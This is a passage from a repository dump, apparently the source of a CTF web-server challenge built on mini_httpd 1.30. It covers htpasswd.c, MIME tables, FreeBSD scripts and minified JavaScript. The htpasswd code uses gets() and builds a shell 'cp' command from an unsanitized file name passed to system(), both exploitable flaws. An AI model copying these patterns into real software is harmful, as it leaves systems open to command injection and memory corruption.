line[x]; 42 | 43 | word[x] = '\0'; 44 | if(line[x]) ++x; 45 | y=0; 46 | 47 | while((line[y++] = line[x++])); 48 | } 49 | 50 | static int my_getline(char *s, int n, FILE *f) { 51 | int i=0; 52 | 53 | while(1) { 54 | s[i] = (char)fgetc(f); 55 | 56 | if(s[i] == CR) 57 | s[i] = fgetc(f); 58 | 59 | if((s[i] == 0x4) || (s[i] == LF) || (i == (n-1))) { 60 | s[i] = '\0'; 61 | return (feof(f) ? 1 : 0); 62 | } 63 | ++i; 64 | } 65 | } 66 | 67 | static void putline(FILE *f,char *l) { 68 | int x; 69 | 70 | for(x=0;l[x];x++) fputc(l[x],f); 71 | fputc('\n',f); 72 | } 73 | 74 | 75 | /* From local_passwd.c (C) Regents of Univ. of California blah blah */ 76 | static unsigned char itoa64[] = /* 0 ... 63 => ascii - 64 */ 77 | "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 78 | 79 | static void to64(char *s, long v, int n) { 80 | while (--n >= 0) { 81 | *s++ = itoa64[v&0x3f]; 82 | v >>= 6; 83 | } 84 | } 85 | 86 | #ifdef MPE 87 | /* MPE lacks getpass() and a way to suppress stdin echo. So for now, just 88 | issue the prompt and read the results with echo. (Ugh). */ 89 | 90 | char *getpass(const char *prompt) { 91 | 92 | static char password[81]; 93 | 94 | fputs(prompt,stderr); 95 | gets((char *)&password); 96 | 97 | if (strlen((char *)&password) > 8) { 98 | password[8]='\0'; 99 | } 100 | 101 | return (char *)&password; 102 | } 103 | #endif 104 | 105 | static void 106 | add_password( char* user, FILE* f ) 107 | { 108 | char pass[100]; 109 | char* pw; 110 | char* cpw; 111 | char salt[3]; 112 | 113 | if ( ! isatty( fileno( stdin ) ) ) 114 | { 115 | (void) fgets( pass, sizeof(pass), stdin ); 116 | if ( pass[strlen(pass) - 1] == '\n' ) 117 | pass[strlen(pass) - 1] = '\0'; 118 | pw = pass; 119 | } 120 | else 121 | { 122 | pw = strd( (char*) getpass( "New password:" ) ); 123 | if ( strcmp( pw, (char*) getpass( "Re-type new password:" ) ) != 0 ) 124 | { 125 | (void) fprintf( stderr, "They don't match, sorry.\n" ); 126 | if ( tfd != -1 ) 127 | unlink( temp_template ); 128 | exit( 1 ); 129 | } 130 | } 131 | (void) srandom( (int) time( (time_t*) 0 ) ); 132 | to64( &salt[0], random(), 2 ); 133 | cpw = crypt( pw, salt ); 134 | (void) fprintf( f, "%s:%s\n", user, cpw ); 135 | } 136 | 137 | static void usage(void) { 138 | fprintf(stderr,"Usage: htpasswd [-c] passwordfile username\n"); 139 | fprintf(stderr,"The -c flag creates a new file.\n"); 140 | exit(1); 141 | } 142 | 143 | void interrupted(int signo) { 144 | fprintf(stderr,"Interrupted.\n"); 145 | if(tfd != -1) unlink(temp_template); 146 | exit(1); 147 | } 148 | 149 | int main(int argc, char *argv[]) { 150 | FILE *tfp,*f; 151 | char user[MAX_STRING_LEN]; 152 | char line[MAX_STRING_LEN]; 153 | char l[MAX_STRING_LEN]; 154 | char w[MAX_STRING_LEN]; 155 | char command[MAX_STRING_LEN]; 156 | int found; 157 | 158 | tfd = -1; 159 | signal(SIGINT,(void (*)(int))interrupted); 160 | if(argc == 4) { 161 | if(strcmp(argv[1],"-c")) 162 | usage(); 163 | if(!(tfp = fopen(argv[2],"w"))) { 164 | fprintf(stderr,"Could not open passwd file %s for writing.\n", 165 | argv[2]); 166 | perror("fopen"); 167 | exit(1); 168 | } 169 | printf("Adding password for %s.\n",argv[3]); 170 | add_password(argv[3],tfp); 171 | fclose(tfp); 172 | exit(0); 173 | } else if(argc != 3) usage(); 174 | 175 | tfd = mkstemp(temp_template); 176 | if(!(tfp = fdopen(tfd,"w"))) { 177 | fprintf(stderr,"Could not open temp file.\n"); 178 | exit(1); 179 | } 180 | 181 | if(!(f = fopen(argv[1],"r"))) { 182 | fprintf(stderr, 183 | "Could not open passwd file %s for reading.\n",argv[1]); 184 | fprintf(stderr,"Use -c option to create new one.\n"); 185 | exit(1); 186 | } 187 | strncpy(user,argv[2],sizeof(user)-1); 188 | user[sizeof(user)-1] = '\0'; 189 | 190 | found = 0; 191 | while(!(my_getline(line,MAX_STRING_LEN,f))) { 192 | if(found || (line[0] == '#') || (!line[0])) { 193 | putline(tfp,line); 194 | continue; 195 | } 196 | strcpy(l,line); 197 | getword(w,l,':'); 198 | if(strcmp(user,w)) { 199 | putline(tfp,line); 200 | continue; 201 | } 202 | else { 203 | printf("Changing password for user %s\n",user); 204 | add_password(user,tfp); 205 | found = 1; 206 | } 207 | } 208 | if(!found) { 209 | printf("Adding user %s\n",user); 210 | add_password(user,tfp); 211 | } 212 | fclose(f); 213 | fclose(tfp); 214 | sprintf(command,"cp %s %s",temp_template,argv[1]); 215 | system(command); 216 | unlink(temp_template); 217 | exit(0); 218 | } 219 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/index.html: -------------------------------------------------------------------------------- 1 | 2 | mini_httpd is running 3 | 4 | 5 |

mini_httpd is running

6 | 7 |

8 | Looks like you got it working. Congrats. 9 | 10 |

11 | Here's a link to the mini_httpd web page. 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/match.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/match.c -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/match.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/match.h -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/mime_encodings.txt: -------------------------------------------------------------------------------- 1 | # mime_encodings.txt 2 | # 3 | # A list of file extensions followed by the corresponding MIME encoding. 4 | # Extensions not found in the table proceed to the mime_types table. 5 | 6 | Z compress 7 | gz gzip 8 | uu x-uuencode 9 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/mime_types.txt: -------------------------------------------------------------------------------- 1 | # mime_types.txt 2 | # 3 | # A list of file extensions followed by the corresponding MIME type. 4 | # Extensions not found in the table are returned as text/plain. 5 | 6 | a application/octet-stream 7 | aab application/x-authorware-bin 8 | aam application/x-authorware-map 9 | aas application/x-authorware-seg 10 | ai application/postscript 11 | aif audio/x-aiff 12 | aifc audio/x-aiff 13 | aiff audio/x-aiff 14 | asc text/plain; charset=%s 15 | asf video/x-ms-asf 16 | asx video/x-ms-asf 17 | au audio/basic 18 | avi video/x-msvideo 19 | bcpio application/x-bcpio 20 | bin application/octet-stream 21 | bmp image/bmp 22 | cdf application/x-netcdf 23 | class application/x-java-vm 24 | cpio application/x-cpio 25 | cpt application/mac-compactpro 26 | crl application/x-pkcs7-crl 27 | crt application/x-x509-ca-cert 28 | csh application/x-csh 29 | css text/css; charset=%s 30 | dcr application/x-director 31 | dir application/x-director 32 | djv image/vnd.djvu 33 | djvu image/vnd.djvu 34 | dll application/octet-stream 35 | dms application/octet-stream 36 | doc application/msword 37 | dtd text/xml; charset=%s 38 | dump application/octet-stream 39 | dvi application/x-dvi 40 | dxr application/x-director 41 | eps application/postscript 42 | etx text/x-setext 43 | exe application/octet-stream 44 | ez application/andrew-inset 45 | fgd application/x-director 46 | fh image/x-freehand 47 | fh4 image/x-freehand 48 | fh5 image/x-freehand 49 | fh7 image/x-freehand 50 | fhc image/x-freehand 51 | gif image/gif 52 | gtar application/x-gtar 53 | hdf application/x-hdf 54 | hqx application/mac-binhex40 55 | htm text/html; charset=%s 56 | html text/html; charset=%s 57 | ice x-conference/x-cooltalk 58 | ief image/ief 59 | iges model/iges 60 | igs model/iges 61 | iv application/x-inventor 62 | jar application/x-java-archive 63 | jfif image/jpeg 64 | jpe image/jpeg 65 | jpeg image/jpeg 66 | jpg image/jpeg 67 | js application/x-javascript 68 | kar audio/midi 69 | kml application/vnd.google-earth.kml+xml 70 | kmz application/vnd.google-earth.kmz 71 | latex application/x-latex 72 | lha application/octet-stream 73 | loc application/xml-loc 74 | lzh application/octet-stream 75 | m3u audio/x-mpegurl 76 | man application/x-troff-man 77 | mathml application/mathml+xml 78 | me application/x-troff-me 79 | mesh model/mesh 80 | mid audio/midi 81 | midi audio/midi 82 | mif application/vnd.mif 83 | mime message/rfc822 84 | mml application/mathml+xml 85 | mov video/quicktime 86 | movie video/x-sgi-movie 87 | mp2 audio/mpeg 88 | mp3 audio/mpeg 89 | mp4 video/mp4 90 | mpe video/mpeg 91 | mpeg video/mpeg 92 | mpg video/mpeg 93 | mpga audio/mpeg 94 | ms application/x-troff-ms 95 | msh model/mesh 96 | mv video/x-sgi-movie 97 | mxu video/vnd.mpegurl 98 | nc application/x-netcdf 99 | o application/octet-stream 100 | oda application/oda 101 | ogg application/ogg 102 | pac application/x-ns-proxy-autoconfig 103 | pbm image/x-portable-bitmap 104 | pdb chemical/x-pdb 105 | pdf application/pdf 106 | pgm image/x-portable-graymap 107 | pgn application/x-chess-pgn 108 | png image/png 109 | pnm image/x-portable-anymap 110 | ppm image/x-portable-pixmap 111 | ppt application/vnd.ms-powerpoint 112 | ps application/postscript 113 | qt video/quicktime 114 | ra audio/x-realaudio 115 | ram audio/x-pn-realaudio 116 | ras image/x-cmu-raster 117 | rdf application/rdf+xml 118 | rgb image/x-rgb 119 | rm audio/x-pn-realaudio 120 | roff application/x-troff 121 | rpm audio/x-pn-realaudio-plugin 122 | rss application/rss+xml 123 | rtf text/rtf; charset=%s 124 | rtx text/richtext; charset=%s 125 | sgm text/sgml; charset=%s 126 | sgml text/sgml; charset=%s 127 | sh application/x-sh 128 | shar application/x-shar 129 | silo model/mesh 130 | sit application/x-stuffit 131 | skd application/x-koan 132 | skm application/x-koan 133 | skp application/x-koan 134 | skt application/x-koan 135 | smi application/smil 136 | smil application/smil 137 | snd audio/basic 138 | so application/octet-stream 139 | spl application/x-futuresplash 140 | src application/x-wais-source 141 | stc application/vnd.sun.xml.calc.template 142 | std application/vnd.sun.xml.draw.template 143 | sti application/vnd.sun.xml.impress.template 144 | stw application/vnd.sun.xml.writer.template 145 | sv4cpio application/x-sv4cpio 146 | sv4crc application/x-sv4crc 147 | svg image/svg+xml 148 | svgz image/svg+xml 149 | swf application/x-shockwave-flash 150 | sxc application/vnd.sun.xml.calc 151 | sxd application/vnd.sun.xml.draw 152 | sxg application/vnd.sun.xml.writer.global 153 | sxi application/vnd.sun.xml.impress 154 | sxm application/vnd.sun.xml.math 155 | sxw application/vnd.sun.xml.writer 156 | t application/x-troff 157 | tar application/x-tar 158 | tcl application/x-tcl 159 | tex application/x-tex 160 | texi application/x-texinfo 161 | texinfo application/x-texinfo 162 | tif image/tiff 163 | tiff image/tiff 164 | tr application/x-troff 165 | tsp application/dsptype 166 | tsv text/tab-separated-values; charset=%s 167 | txt text/plain; charset=%s 168 | ustar application/x-ustar 169 | vcd application/x-cdlink 170 | vrml model/vrml 171 | vx video/x-rad-screenplay 172 | wav audio/x-wav 173 | wax audio/x-ms-wax 174 | wbmp image/vnd.wap.wbmp 175 | wbxml application/vnd.wap.wbxml 176 | wm video/x-ms-wm 177 | wma audio/x-ms-wma 178 | wmd application/x-ms-wmd 179 | wml text/vnd.wap.wml 180 | wmlc application/vnd.wap.wmlc 181 | wmls text/vnd.wap.wmlscript 182 | wmlsc application/vnd.wap.wmlscriptc 183 | wmv video/x-ms-wmv 184 | wmx video/x-ms-wmx 185 | wmz application/x-ms-wmz 186 | wrl model/vrml 187 | wsrc application/x-wais-source 188 | wvx video/x-ms-wvx 189 | xbm image/x-xbitmap 190 | xht application/xhtml+xml; charset=%s 191 | xhtml application/xhtml+xml; charset=%s 192 | xls application/vnd.ms-excel 193 | xml text/xml; charset=%s 194 | xpm image/x-xpixmap 195 | xsl text/xml; charset=%s 196 | xwd image/x-xwindowdump 197 | xyz chemical/x-xyz 198 | zip application/zip 199 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/mini_httpd.8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/mini_httpd.8 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/mini_httpd.cnf: -------------------------------------------------------------------------------- 1 | # create RSA certs - Server 2 | 3 | RANDFILE = mini_httpd.rnd 4 | 5 | [ req ] 6 | default_bits = 1024 7 | encrypt_key = yes 8 | distinguished_name = req_dn 9 | x509_extensions = cert_type 10 | 11 | [ req_dn ] 12 | countryName = Country Name (2 letter code) 13 | countryName_default = PL 14 | countryName_min = 2 15 | countryName_max = 2 16 | 17 | stateOrProvinceName = State or Province Name (full name) 18 | stateOrProvinceName_default = Some-State 19 | 20 | localityName = Locality Name (eg, city) 21 | 22 | 0.organizationName = Organization Name (eg, company) 23 | 0.organizationName_default = Mini Webservice Ltd 24 | 25 | organizationalUnitName = Organizational Unit Name (eg, section) 26 | #organizationalUnitName_default = 27 | 28 | 0.commonName = Common Name (FQDN of your server) 29 | 30 | # To create a certificate for more than one name uncomment: 31 | # 1.commonName = DNS alias of your server 32 | # 2.commonName = DNS alias of your server 33 | # ... 34 | # See http://home.netscape.com/eng/security/ssl_2.0_certificate.html 35 | # too see how Netscape understands commonName. 36 | 37 | [ cert_type ] 38 | nsCertType = server 39 | 40 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/port.h: -------------------------------------------------------------------------------- 1 | /* port.h - portability defines */ 2 | 3 | #if defined(__FreeBSD__) 4 | # define OS_FreeBSD 5 | # define ARCH "FreeBSD" 6 | #elif defined(__OpenBSD__) 7 | # define OS_OpenBSD 8 | # define ARCH "OpenBSD" 9 | #elif defined(__NetBSD__) 10 | # define OS_NetBSD 11 | # define ARCH "NetBSD" 12 | #elif defined(linux) 13 | # define OS_Linux 14 | # define ARCH "Linux" 15 | #elif defined(sun) || defined(SunOS) || defined(Solaris) || defined(__sun__) 16 | # define OS_Solaris 17 | # define ARCH "Solaris" 18 | #elif defined(__osf__) 19 | # define OS_DigitalUnix 20 | # define ARCH "DigitalUnix" 21 | #elif defined(__svr4__) 22 | # define OS_SysV 23 | # define ARCH "SysV" 24 | #else 25 | # define OS_UNKNOWN 26 | # define ARCH "UNKNOWN" 27 | #endif 28 | 29 | #ifdef OS_FreeBSD 30 | # include 31 | # define HAVE_DAEMON 32 | # define HAVE_SETSID 33 | # define HAVE_SETLOGIN 34 | # define HAVE_WAITPID 35 | # define HAVE_HSTRERROR 36 | # define HAVE_TM_GMTOFF 37 | # define HAVE_SENDFILE 38 | # define HAVE_SCANDIR 39 | # define HAVE_INT64T 40 | # define HAVE_SRANDOMDEV 41 | # ifdef SO_ACCEPTFILTER 42 | # define HAVE_ACCEPT_FILTERS 43 | # if ( __FreeBSD_version >= 411000 ) 44 | # define ACCEPT_FILTER_NAME "httpready" 45 | # else 46 | # define ACCEPT_FILTER_NAME "dataready" 47 | # endif 48 | # endif /* SO_ACCEPTFILTER */ 49 | #endif /* OS_FreeBSD */ 50 | 51 | #ifdef OS_OpenBSD 52 | # define HAVE_DAEMON 53 | # define HAVE_SETSID 54 | # define HAVE_SETLOGIN 55 | # define HAVE_WAITPID 56 | # define HAVE_HSTRERROR 57 | # define HAVE_TM_GMTOFF 58 | # define HAVE_SCANDIR 59 | # define HAVE_INT64T 60 | #endif /* OS_OpenBSD */ 61 | 62 | #ifdef OS_NetBSD 63 | # define HAVE_DAEMON 64 | # define HAVE_SETSID 65 | # define HAVE_SETLOGIN 66 | # define HAVE_WAITPID 67 | # define HAVE_HSTRERROR 68 | # define HAVE_TM_GMTOFF 69 | # define HAVE_SCANDIR 70 | # define HAVE_INT64T 71 | #endif /* OS_NetBSD */ 72 | 73 | #ifdef OS_Linux 74 | # define HAVE_DAEMON 75 | # define HAVE_SETSID 76 | # define HAVE_WAITPID 77 | # define HAVE_TM_GMTOFF 78 | # define HAVE_SENDFILE 79 | # define HAVE_LINUX_SENDFILE 80 | # define HAVE_SCANDIR 81 | # define HAVE_INT64T 82 | #endif /* OS_Linux */ 83 | 84 | #ifdef OS_Solaris 85 | # define HAVE_SETSID 86 | # define HAVE_WAITPID 87 | # define HAVE_MEMORY_H 88 | # define HAVE_SIGSET 89 | # define HAVE_INT64T 90 | # define HAVE_RAND 91 | # define HAVE_SENDFILE 92 | # define HAVE_LINUX_SENDFILE 93 | #endif /* OS_Solaris */ 94 | 95 | #ifdef OS_DigitalUnix 96 | # define HAVE_SETSID 97 | # define HAVE_SETLOGIN 98 | # define HAVE_WAITPID 99 | # define HAVE_SCANDIR 100 | # define HAVE_TM_GMTOFF 101 | # define NO_SNPRINTF 102 | /* # define HAVE_INT64T */ /* Digital Unix 4.0d doesn't have int64_t */ 103 | #endif /* OS_DigitalUnix */ 104 | 105 | #ifdef OS_SysV 106 | # define HAVE_SETSID 107 | # define HAVE_WAITPID 108 | # define HAVE_MEMORY_H 109 | # define HAVE_SIGSET 110 | # define HAVE_RAND 111 | #endif /* OS_SysV */ 112 | 113 | #ifdef HAVE_RAND 114 | # define srandom srand 115 | # define random rand 116 | #endif /* HAVE_RAND */ 117 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/scripts/500.mini_httpd-rotate: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # mini_httpd-rotate - nightly script to rotate mini_httpd's log files on FreeBSD 4 | # 5 | # This goes in /etc/periodic/daily. It rotates the log files and then 6 | # tells mini_httpd to re-open its log file. 7 | 8 | cd /usr/local/www/chroot/logs 9 | rm -f mini_httpd_log.7.gz 10 | mv mini_httpd_log.6.gz mini_httpd_log.7.gz 11 | mv mini_httpd_log.5.gz mini_httpd_log.6.gz 12 | mv mini_httpd_log.4.gz mini_httpd_log.5.gz 13 | mv mini_httpd_log.3.gz mini_httpd_log.4.gz 14 | mv mini_httpd_log.2.gz mini_httpd_log.3.gz 15 | mv mini_httpd_log.1.gz mini_httpd_log.2.gz 16 | mv mini_httpd_log mini_httpd_log.1 17 | kill -HUP `cat /var/run/mini_httpd.pid` 18 | sleep 1 19 | gzip -f mini_httpd_log.1 20 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/scripts/mini_httpd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # mini_httpd.sh - startup script for mini_httpd on FreeBSD 4 | # 5 | # This should be manually installed as: 6 | # /usr/local/etc/rc.d/mini_httpd 7 | # It gets run at boot-time. 8 | # 9 | # Variables available: 10 | # mini_httpd_enable='YES' 11 | # mini_httpd_program='/usr/local/sbin/mini_httpd' 12 | # mini_httpd_pidfile='/var/run/mini_httpd.pid' 13 | # mini_httpd_devfs=... 14 | # mini_httpd_flags=... 15 | # 16 | # PROVIDE: mini_httpd 17 | # REQUIRE: LOGIN FILESYSTEMS 18 | # KEYWORD: shutdown 19 | 20 | . /etc/rc.subr 21 | 22 | name='mini_httpd' 23 | rcvar='mini_httpd_enable' 24 | start_precmd='mini_httpd_precmd' 25 | mini_httpd_enable_defval='NO' 26 | 27 | load_rc_config "$name" 28 | command="${mini_httpd_program:-/usr/local/sbin/${name}}" 29 | pidfile="${mini_httpd_pidfile:-/var/run/${name}.pid}" 30 | command_args="-i ${pidfile}" 31 | 32 | mini_httpd_precmd () 33 | { 34 | if [ -n "$mini_httpd_devfs" ] ; then 35 | mount -t devfs devfs "$mini_httpd_devfs" 36 | devfs -m "$mini_httpd_devfs" rule -s 1 applyset 37 | devfs -m "$mini_httpd_devfs" rule -s 2 applyset 38 | fi 39 | } 40 | 41 | run_rc_command "$1" 42 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/scripts/mini_httpd_wrapper: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # mini_httpd_wrapper - wrapper script for mini_httpd on FreeBSD 4 | # 5 | # This goes in /usr/local/sbin. It backgrounds itself, and then runs 6 | # mini_httpd in a loop. If mini_httpd exits then the script restarts 7 | # it automatically. 8 | # 9 | # The -D flag tells mini_httpd to *not* put itself into the background, 10 | # and the -C flag tells it to get the rest of its configuration from 11 | # the specified config file. 12 | 13 | ( 14 | while true ; do 15 | /usr/local/sbin/mini_httpd -D -C /usr/local/www/mini_httpd_config 16 | if [ -f /var/run/nologin ] ; then 17 | exit 18 | fi 19 | sleep 10 20 | egrep ' mini_httpd[:\[]' /var/log/messages | 21 | tail -33 | 22 | mail -s "mini_httpd on `hostname` restarted" root 23 | done 24 | ) & 25 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/tdate_parse.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.c -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/tdate_parse.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/tdate_parse.h -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/version.h: -------------------------------------------------------------------------------- 1 | /* version.h - version defines for mini_httpd */ 2 | 3 | #ifndef _VERSION_H_ 4 | #define _VERSION_H_ 5 | 6 | #define SERVER_SOFTWARE "trusted_httpd/1.0 Author: Eqqie@d3ctf" 7 | #define SERVER_URL "https://d3ctf.io/#/" 8 | 9 | #endif /* _VERSION_H_ */ 10 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/bootstrap-treeview.min.css: -------------------------------------------------------------------------------- 1 | .treeview .list-group-item { 2 | cursor: pointer 3 | } 4 | 5 | .treeview span.indent { 6 | margin-left: 10px; 7 | margin-right: 10px 8 | } 9 | 10 | .treeview span.icon { 11 | width: 12px; 12 | margin-right: 5px 13 | } 14 | 15 | .treeview .node-disabled { 16 | color: silver; 17 | cursor: not-allowed 18 | } -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/bootstrap-treeview.min.js: -------------------------------------------------------------------------------- 1 | !function(a,b,c,d){"use strict";var e="treeview",f={};f.settings={injectStyle:!0,levels:2,expandIcon:"glyphicon glyphicon-plus",collapseIcon:"glyphicon glyphicon-minus",emptyIcon:"glyphicon",nodeIcon:"",selectedIcon:"",checkedIcon:"glyphicon glyphicon-check",uncheckedIcon:"glyphicon glyphicon-unchecked",color:d,backColor:d,borderColor:d,onhoverColor:"#F5F5F5",selectedColor:"#FFFFFF",selectedBackColor:"#428bca",searchResultColor:"#D9534F",searchResultBackColor:d,enableLinks:!1,highlightSelected:!0,highlightSearchResults:!0,showBorder:!0,showIcon:!0,showCheckbox:!1,showTags:!1,multiSelect:!1,onNodeChecked:d,onNodeCollapsed:d,onNodeDisabled:d,onNodeEnabled:d,onNodeExpanded:d,onNodeSelected:d,onNodeUnchecked:d,onNodeUnselected:d,onSearchComplete:d,onSearchCleared:d},f.options={silent:!1,ignoreChildren:!1},f.searchOptions={ignoreCase:!0,exactMatch:!1,revealResults:!0};var g=function(b,c){return this.$element=a(b),this.elementId=b.id,this.styleId=this.elementId+"-style",this.init(c),{options:this.options,init:a.proxy(this.init,this),remove:a.proxy(this.remove,this),getNode:a.proxy(this.getNode,this),getParent:a.proxy(this.getParent,this),getSiblings:a.proxy(this.getSiblings,this),getSelected:a.proxy(this.getSelected,this),getUnselected:a.proxy(this.getUnselected,this),getExpanded:a.proxy(this.getExpanded,this),getCollapsed:a.proxy(this.getCollapsed,this),getChecked:a.proxy(this.getChecked,this),getUnchecked:a.proxy(this.getUnchecked,this),getDisabled:a.proxy(this.getDisabled,this),getEnabled:a.proxy(this.getEnabled,this),selectNode:a.proxy(this.selectNode,this),unselectNode:a.proxy(this.unselectNode,this),toggleNodeSelected:a.proxy(this.toggleNodeSelected,this),collapseAll:a.proxy(this.collapseAll,this),collapseNode:a.proxy(this.collapseNode,this),expandAll:a.proxy(this.expandAll,this),expandNode:a.proxy(this.expandNode,this),toggleNodeExpanded:a.proxy(this.toggleNodeExpanded,this),revealNode:a.proxy(this.revealNode,this),checkAll:a.proxy(this.checkAll,this),checkNode:a.proxy(this.checkNode,this),uncheckAll:a.proxy(this.uncheckAll,this),uncheckNode:a.proxy(this.uncheckNode,this),toggleNodeChecked:a.proxy(this.toggleNodeChecked,this),disableAll:a.proxy(this.disableAll,this),disableNode:a.proxy(this.disableNode,this),enableAll:a.proxy(this.enableAll,this),enableNode:a.proxy(this.enableNode,this),toggleNodeDisabled:a.proxy(this.toggleNodeDisabled,this),search:a.proxy(this.search,this),clearSearch:a.proxy(this.clearSearch,this)}};g.prototype.init=function(b){this.tree=[],this.nodes=[],b.data&&("string"==typeof b.data&&(b.data=a.parseJSON(b.data)),this.tree=a.extend(!0,[],b.data),delete b.data),this.options=a.extend({},f.settings,b),this.destroy(),this.subscribeEvents(),this.setInitialStates({nodes:this.tree},0),this.render()},g.prototype.remove=function(){this.destroy(),a.removeData(this,e),a("#"+this.styleId).remove()},g.prototype.destroy=function(){this.initialized&&(this.$wrapper.remove(),this.$wrapper=null,this.unsubscribeEvents(),this.initialized=!1)},g.prototype.unsubscribeEvents=function(){this.$element.off("click"),this.$element.off("nodeChecked"),this.$element.off("nodeCollapsed"),this.$element.off("nodeDisabled"),this.$element.off("nodeEnabled"),this.$element.off("nodeExpanded"),this.$element.off("nodeSelected"),this.$element.off("nodeUnchecked"),this.$element.off("nodeUnselected"),this.$element.off("searchComplete"),this.$element.off("searchCleared")},g.prototype.subscribeEvents=function(){this.unsubscribeEvents(),this.$element.on("click",a.proxy(this.clickHandler,this)),"function"==typeof this.options.onNodeChecked&&this.$element.on("nodeChecked",this.options.onNodeChecked),"function"==typeof this.options.onNodeCollapsed&&this.$element.on("nodeCollapsed",this.options.onNodeCollapsed),"function"==typeof this.options.onNodeDisabled&&this.$element.on("nodeDisabled",this.options.onNodeDisabled),"function"==typeof this.options.onNodeEnabled&&this.$element.on("nodeEnabled",this.options.onNodeEnabled),"function"==typeof this.options.onNodeExpanded&&this.$element.on("nodeExpanded",this.options.onNodeExpanded),"function"==typeof this.options.onNodeSelected&&this.$element.on("nodeSelected",this.options.onNodeSelected),"function"==typeof this.options.onNodeUnchecked&&this.$element.on("nodeUnchecked",this.options.onNodeUnchecked),"function"==typeof this.options.onNodeUnselected&&this.$element.on("nodeUnselected",this.options.onNodeUnselected),"function"==typeof this.options.onSearchComplete&&this.$element.on("searchComplete",this.options.onSearchComplete),"function"==typeof this.options.onSearchCleared&&this.$element.on("searchCleared",this.options.onSearchCleared)},g.prototype.setInitialStates=function(b,c){if(b.nodes){c+=1;var d=b,e=this;a.each(b.nodes,function(a,b){b.nodeId=e.nodes.length,b.parentId=d.nodeId,b.hasOwnProperty("selectable")||(b.selectable=!0),b.state=b.state||{},b.state.hasOwnProperty("checked")||(b.state.checked=!1),b.state.hasOwnProperty("disabled")||(b.state.disabled=!1),b.state.hasOwnProperty("expanded")||(!b.state.disabled&&c0?b.state.expanded=!0:b.state.expanded=!1),b.state.hasOwnProperty("selected")||(b.state.selected=!1),e.nodes.push(b),b.nodes&&e.setInitialStates(b,c)})}},g.prototype.clickHandler=function(b){this.options.enableLinks||b.preventDefault();var c=a(b.target),d=this.findNode(c);if(d&&!d.state.disabled){var e=c.attr("class")?c.attr("class").split(" "):[];-1!==e.indexOf("expand-icon")?(this.toggleExpandedState(d,f.options),this.render()):-1!==e.indexOf("check-icon")?(this.toggleCheckedState(d,f.options),this.render()):(d.selectable?this.toggleSelectedState(d,f.options):this.toggleExpandedState(d,f.options),this.render())}},g.prototype.findNode=function(a){var b=a.closest("li.list-group-item").attr("data-nodeid"),c=this.nodes[b];return c||console.log("Error: node does not exist"),c},g.prototype.toggleExpandedState=function(a,b){a&&this.setExpandedState(a,!a.state.expanded,b)},g.prototype.setExpandedState=function(b,c,d){c!==b.state.expanded&&(c&&b.nodes?(b.state.expanded=!0,d.silent||this.$element.trigger("nodeExpanded",a.extend(!0,{},b))):c||(b.state.expanded=!1,d.silent||this.$element.trigger("nodeCollapsed",a.extend(!0,{},b)),b.nodes&&!d.ignoreChildren&&a.each(b.nodes,a.proxy(function(a,b){this.setExpandedState(b,!1,d)},this))))},g.prototype.toggleSelectedState=function(a,b){a&&this.setSelectedState(a,!a.state.selected,b)},g.prototype.setSelectedState=function(b,c,d){c!==b.state.selected&&(c?(this.options.multiSelect||a.each(this.findNodes("true","g","state.selected"),a.proxy(function(a,b){this.setSelectedState(b,!1,d)},this)),b.state.selected=!0,d.silent||this.$element.trigger("nodeSelected",a.extend(!0,{},b))):(b.state.selected=!1,d.silent||this.$element.trigger("nodeUnselected",a.extend(!0,{},b))))},g.prototype.toggleCheckedState=function(a,b){a&&this.setCheckedState(a,!a.state.checked,b)},g.prototype.setCheckedState=function(b,c,d){c!==b.state.checked&&(c?(b.state.checked=!0,d.silent||this.$element.trigger("nodeChecked",a.extend(!0,{},b))):(b.state.checked=!1,d.silent||this.$element.trigger("nodeUnchecked",a.extend(!0,{},b))))},g.prototype.setDisabledState=function(b,c,d){c!==b.state.disabled&&(c?(b.state.disabled=!0,this.setExpandedState(b,!1,d),this.setSelectedState(b,!1,d),this.setCheckedState(b,!1,d),d.silent||this.$element.trigger("nodeDisabled",a.extend(!0,{},b))):(b.state.disabled=!1,d.silent||t